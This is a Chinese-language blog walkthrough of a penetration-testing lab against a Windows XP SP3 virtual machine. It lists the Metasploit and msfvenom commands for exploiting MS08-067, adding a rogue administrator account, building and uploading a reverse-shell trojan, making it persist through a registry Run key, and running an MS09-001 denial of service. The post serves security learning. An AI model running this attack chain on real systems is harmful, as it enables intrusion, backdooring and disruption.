靶机:WinXPenSP3


WinXPenSP3靶机安装与配置

靶机下载地址:

下载链接:https://jwt1399.lanzoui.com/iv2VJde68vc

安装&配置:

1.下载好压缩包解压,导入VWware,启动WinXPenSP3,登陆密码为123456

2.打开Control Panel–>Network Connections–>右击Local Area Connection–>选择properties–>双击Internet Protocol(TCP/IP)–>勾选Obtain an IP address automatically

3.将该靶机网络适配器改为桥接模式,你的攻击机也改为桥接模式,保证他俩能正常通信

环境

1.网络环境

机器 IP
攻击机:Kali-2020 192.168.1.110
靶 机:WinXP 192.168.1.102

2.主要使用工具

工具 Version
metasploit 5.0.92
nmap 7.80
Nessus 8.10.0

目标&任务

1.探测靶机WinXPenSP3的漏洞&利用

2.利用漏洞Getshell

3.提权&持久化:增加Administrators权限用户,攻击机监听端口等待反弹shell,上传木马客服端程序,添加注册表信息,设置木马程序开机自启动等。

一、信息收集

1.探测目标

sudo arp-scan -l

获得靶机IP: 192.168.1.102

2.探测开放端口

nmap -sV -p- 192.168.1.102

开放了端口139,445,这是SMB协议使用的端口,那么后面我们可以尝试使用nmap扫描smb相关漏洞

注:SMB协议是基于TCP-NETBIOS下的,一般端口使用为139,445

3.根据开放端口进一步获取信息

尝试通过SMB 协议确定操作系统、计算机名称、域、工作组和当前时间。

sudo nmap --script=smb-os-discovery.nse 192.168.1.102

二、漏洞扫描

1.使用nmap扫描漏洞

sudo nmap --script=smb-check-vulns.nse 192.168.1.102

直接执行会报错,因为新版Nmap,smb-check-vulns.nse脚本被取消了。

它被分为smb-vuln-conficker、smb-vuln-cve2009-3103、smb-vuln-ms06-025、smb-vuln-ms07-029、smb-vuln-regsvc-dos、smb-vuln-ms08-067这六个脚本,用户根据需要选择对应的脚本。

解决方案

1.直接进行全扫描(执行上方6个脚本)

sudo nmap --script=smb-check-vulns-*.nse 192.168.1.102

2.获取smb-check-vulns.nse,放入/usr/share/nmap/scripts/【nmap存放漏洞匹配文件的目录】

smb-check-vulns.nse获取地址:https://jwt1399.lanzoui.com/iYH7Wdg2k8j

2.使用Nessus扫描漏洞

通过Nessus扫面的漏洞报告,对各个漏洞逐一利用。

三、漏洞利用&提权

MS08-067

MS08-067-漏洞利用

1)首先运行metasploit,使用search ms08-067寻找可利用的漏洞点

sudo msfdb init && msfconsole
search MS08-067

2)使用攻击模块,使用show options查看我们需要设置的参数。

use exploit/windows/smb/ms08_067_netapi

show options #可以看到RHOSTS必须设置

3)设置RHOSTS(远程IP),即靶机的ip,然后run或者exploit,成功Getshell

set RHOSTS 192.168.1.102
run 或者 exploit
shell

MS08-067-提权

添加Administrators权限用户
#添加hacker用户
net user hacker hacker /add

#添加hacker用户添加进administrators组
net localgroup administrators hacker /add

#查看用户
net user
#删除用户
net user hacker /delete  #渗透结束后再删除,擦干净屁股再走

可以看到成功添加了hacker用户

制作&上传木马
服务端

监听端口等待反弹shell。使用exploit/multi/handler模块,并设置参数之后运行。

use exploit/multi/handler     

set payload windows/meterpreter/reverse_tcp
show options

设置LHOST(本地IP,攻击机Kali的IP)和LPORT

set LHOST 192.168.1.110
set LPORT 12345   #也可以使用默认的4444端口

run 或者 exploit

这里先放着,不要关窗口,监听端口等待后面我们上传木马反弹shell

客户端

使用msfvenom构造客户端木马程序,并上传

msfvenom -p windows/shell/reverse_tcp LHOST=192.168.1.110 LPORT=12345 -f exe -o jian.exe

利用上面漏洞将做好的木马植入靶机

sudo msfdb init && msfconsole
search ms08-067
use exploit/windows/smb/ms08_067_netapi
show options
set RHOSTS 192.168.1.102
Run
shell

使用upload上传木马

upload /home/kali/Desktop/jian.exe C:\\WINDOWS\\system32

可以看到jian.exe已经成功上传到靶机

在获取的shell上运行jian.exe,成功反弹shell到攻击机上【就是上面监听端口等待反弹shell的那个窗口】

设置木马开机启动

设置木马开机启动:利用注册表添加后门,先查看原开机启动的应用

reg enumkey -k HKLM\\software\\microsoft\\windows\\currentversion\\run

利用注册表增加开机启动应用,添加注册表信息,设置jian.exe开机自启。

reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v sys -d 'C:\WINDOWS\system32\jian.exe Ldp 443 -e cmd.exe'

其他操作

还可以通过sysinfol来查看系统信息。

使用hashdump来查看系统用户名和密码的hash值,如果密码简单,可以通过爆破hash来得到登录密码。

MS17-010(永恒之蓝)

跟上面漏洞利用差不多

成功getshell,后续操作跟前面一样

MS09-001

sudo msfdb init && msfconsole

Search MS09-001

use auxiliary/dos/windows/smb/ms09_001_write

show options

set RHOSTS 192.168.1.102

run 或者 exploit

对靶机发起了拒绝服务攻击,具体对靶机的影响暂时不知

赞助💰

如果你觉得对你有帮助,你可以赞助我一杯冰可乐!嘻嘻🤭

支付宝支付 微信支付

文章作者: 简简
版权声明: 本博客所有文章除特別声明外,均采用 CC BY 4.0 许可协议。转载请注明来源 简简 !
评论
填上邮箱会收到评论回复提醒哦!!!
 上一篇
代码审计:BlueCMS v1.6 代码审计:BlueCMS v1.6
BlueCMS是一款专注于地方门户网站建设解决方案,基于PHP+MySQL的技术开发,全部源码开放。很适合用来源码审计
2020-06-04
下一篇 
JSP学习笔记 JSP学习笔记
本文章是Java web 课的课堂笔记,一来觉得学东西的时候记录下来效率会比较高,二来记忆力下降明显,方便自己以后复习吧😁😁
2020-05-27
  目录